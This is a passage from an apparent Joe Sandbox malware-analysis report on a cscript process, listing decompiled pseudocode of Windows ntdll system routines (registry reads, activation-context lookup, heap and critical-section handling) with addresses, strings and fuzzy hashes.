				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0557138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x055805c5
0x055805ca
0x055805d3
0x055806db
0x055806db
0x055806dd
0x055806e3
0x055806e3
0x055805dd
0x055805e7
0x055805f6
0x05580600
0x05580607
0x05580610
0x05580615
0x0558061a
0x0558061c
0x0558061e
0x05580624
0x05580625
0x05580627
0x05580628
0x05580631
0x05580640
0x0558064d
0x05580654
0x05580654
0x05580631
0x0558066d
0x05580674
0x00000000
0x00000000
0x05580692
0x0558069e
0x055806b0
0x055806a0
0x055806a9
0x055806a9
0x055806b8
0x055806d6
0x055806d6
0x00000000

Strings

`, xrefs: 05580633

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 76b0bea990c225b44c17783dac1eda90018d4f8d5611c0301f05d3216831a4f2
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: F431E2327047056BE720EE26CC48FAB77D9FBC4754F044229F955AB2D0D670E909CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05533884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E05533884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E054F9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L054D4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E054F9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x05533893
0x05533896
0x05533899
0x0553389f
0x055338a0
0x055338a4
0x055338a9
0x055338ac
0x055338ad
0x055338ae
0x055338af
0x055338b1
0x055338b4
0x055338bb
0x055338bc
0x055338bd
0x055338c4
0x055338c8
0x055338ca
0x055338ca
0x055338d5
0x0553393e
0x05533940
0x05533942
0x05533952
0x05533954
0x05533961
0x05533961
0x05533967
0x0553396e
0x0553396e
0x05533947
0x0553394c
0x00000000
0x0553394c
0x055338ea
0x055338ee
0x055338f8
0x055338f9
0x055338ff
0x05533900
0x05533902
0x05533903
0x0553390b
0x0553390f
0x05533950
0x00000000
0x05533950
0x05533915
0x0553391d
0x0553391d
0x05533922
0x05533926
0x00000000
0x05533928
0x0553392b
0x0553392b
0x05533935
0x05533937
0x05533937
0x00000000
0x05533935
0x05533926
0x055338f0
0x00000000

Strings

BinaryName, xrefs: 055338B4

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: f91a6ee6d45bbbc05986cb1dbc73b0dbd9d4f48beb0668af9ffa061693216dd0
Instruction ID: 4d1eae55941e91b429703fc0360643e380b6973f75071d5137f2ae287e428f5f
Opcode Fuzzy Hash: f91a6ee6d45bbbc05986cb1dbc73b0dbd9d4f48beb0668af9ffa061693216dd0
Instruction Fuzzy Hash: 7F31D133905519EFEB15DE59C946EBBF775FB80B20F024969A919AB250E7309E00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 054ED294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E054ED294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x55ad360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E054D4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E054FB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E054F98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E054F95D0();
					L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x054ed29c
0x054ed2a6
0x054ed2b1
0x054ed2b5
0x054ed2b6
0x054ed2bc
0x054ed2bd
0x054ed2be
0x054ed2bf
0x054ed2c2
0x054ed2c4
0x054ed2cc
0x054ed384
0x054ed34b
0x054ed34f
0x054ed350
0x054ed351
0x054ed35c
0x054ed35c
0x054ed2d6
0x054ed2da
0x054ed2e1
0x054ed361
0x054ed369
0x054ed36d
0x054ed2e3
0x054ed2e3
0x054ed2e3
0x054ed2e5
0x054ed2ed
0x054ed2f5
0x054ed2fa
0x054ed302
0x054ed303
0x054ed30b
0x054ed30f
0x054ed313
0x054ed318
0x054ed31c
0x054ed320
0x054ed379
0x054ed37d
0x00000000
0x00000000
0x0552affe
0x0552b001
0x0552b011
0x00000000
0x054ed322
0x054ed322
0x054ed330
0x054ed337
0x054ed35d
0x054ed339
0x054ed33f
0x054ed38c
0x054ed38c
0x054ed33f
0x054ed349
0x00000000
0x054ed349

Strings

@, xrefs: 054ED303

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: d789e912891db782edc6ace165096f615f714353bc00a2fe6c498dcb94ada7cc
Instruction ID: dd222c3fe75b474306cc3cc85b714843131c76c859e5c8273f16ee7eafe28f16
Opcode Fuzzy Hash: d789e912891db782edc6ace165096f615f714353bc00a2fe6c498dcb94ada7cc
Instruction Fuzzy Hash: 0931A2B5A083059FC721DF29C984AEBFBE9FB85654F00092FF99583250D634DD05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 054C1B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E054C1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E054FBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E054FA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E054FA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L054D4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x054c1b8f
0x054c1b9a
0x054c1b9c
0x054c1b9e
0x054c1ba3
0x05517010
0x05517010
0x00000000
0x054c1ba9
0x054c1ba9
0x054c1bae
0x00000000
0x054c1bc5
0x054c1bca
0x054c1bcf
0x054c1bd0
0x054c1bd1
0x054c1bd2
0x054c1bd6
0x054c1bdc
0x054c1be0
0x05516ffc
0x05517000
0x00000000
0x05517006
0x05517009
0x05517009
0x054c1be6
0x054c1bec
0x054c1c0b
0x054c1c0b
0x054c1c0c
0x054c1c11
0x054c1c12
0x054c1c15
0x054c1c1b
0x054c1c1f
0x054c1c31
0x054c1c33
0x05517026
0x05517026
0x054c1c21
0x054c1c24
0x054c1c24
0x054c1bee
0x054c1bee
0x054c1bf2
0x054c1c3a
0x054c1bf4
0x054c1bf4
0x054c1c05
0x054c1c05
0x054c1c09
0x054c1c3e
0x00000000
0x00000000
0x00000000
0x054c1c09
0x054c1bec
0x054c1be0
0x054c1bae
0x054c1c2e

Strings

WindowsExcludedProcs, xrefs: 054C1BC5

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 2dcb675204744b988055c8a5286ba9b625f991214e55d282e9caccfd393bf408
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: FB21D67A600218ABDB61DA598844FEFBFB9FB85650F0544ABFD058B201D630D901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 054DF716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054DF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x054df71d
0x054df722
0x054df726
0x05524770
0x054df765
0x054df769
0x054df769
0x054df732
0x0552477a
0x00000000
0x0552477a
0x054df738
0x054df73a
0x054df73c
0x054df73f
0x054df746
0x054df778
0x054df7a9
0x054df7a9
0x054df754
0x054df75a
0x054df75d
0x054df75f
0x054df761
0x054df76f
0x054df771
0x054df771
0x054df76f
0x054df763
0x00000000
0x054df763
0x054df77d
0x054df7a3
0x054df7a5
0x00000000
0x054df7a5
0x054df77f
0x054df782
0x054df784
0x054df786
0x00000000
0x00000000
0x00000000
0x054df788
0x054df748
0x054df74d
0x054df78d
0x054df793
0x054df7b7
0x054df7bc
0x00000000
0x054df7bc
0x054df798
0x00000000
0x00000000
0x054df79d
0x054df7b0
0x00000000
0x054df7b0
0x054df79f
0x00000000
0x054df74f
0x054df74f
0x00000000
0x054df74f

Strings

Actx , xrefs: 054DF73F

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 783d6002281d066aa3b81630042b9aca47ca129bc20f254d909aac5a9d25fcce
Instruction ID: 299478b7355d6df6cc544da3b0c4d8ed8fe67ee25f10c762d8b8048b107f58f9
Opcode Fuzzy Hash: 783d6002281d066aa3b81630042b9aca47ca129bc20f254d909aac5a9d25fcce
Instruction Fuzzy Hash: C511D634308602ABEBF48E1C84747F7F297BB85214F24456BD467CB391D770D84A8360

Uniqueness

Uniqueness Score: -1.00%

Function 05568DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E05568DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x5590d50);
				E0550D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E05545720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0550DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0550DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0550D130(_t34, _t39, _t40);
			}

0x05568df1
0x05568df1
0x05568df1
0x05568df1
0x05568df1
0x05568df1
0x05568df3
0x05568df8
0x05568dfd
0x05568e00
0x05568e0e
0x05568e2a
0x05568e36
0x05568e38
0x05568e3c
0x05568e46
0x05568e46
0x05568e36
0x05568e50
0x05568e56
0x05568e59
0x05568e5c
0x05568e60
0x05568e67
0x05568e6d
0x05568e73
0x05568e74
0x05568eb1
0x05568ebd

Strings

Critical error detected %lx, xrefs: 05568E21

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 31a466252c6529beacc3440ef75eb54f3843794affe4ace3e5fe27e64643cf01
Instruction ID: 69361b1547f0f5c4f1b10fbf39ea0940c156101287218612cef87a05cdaba01e
Opcode Fuzzy Hash: 31a466252c6529beacc3440ef75eb54f3843794affe4ace3e5fe27e64643cf01
Instruction Fuzzy Hash: E8113575E14388DADF28CFA8850A7DDBBF1BB44314F24426EE529AB392D7344A02CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0554FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0554FF60

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 5567f159b349b7db200174c5fb9eecbb128d44ddeec6451b2aa0cc65ae046c46
Instruction ID: 580649c1a0bf6ec3a76a9980df69078bb5b2d35914816e54349ae9950c123d9b
Opcode Fuzzy Hash: 5567f159b349b7db200174c5fb9eecbb128d44ddeec6451b2aa0cc65ae046c46
Instruction Fuzzy Hash: 9711E171A10184EFDB21DF54C849F987BB1FF48708F148054F409672A1CB399940DF50

Uniqueness

Uniqueness Score: -1.00%

Function 05585BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E05585BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x5591178);
				E0550D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E05584C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E054FD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E05585542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x55a60e8;
								if( *0x55a60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x55a60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E054F9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E054F6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
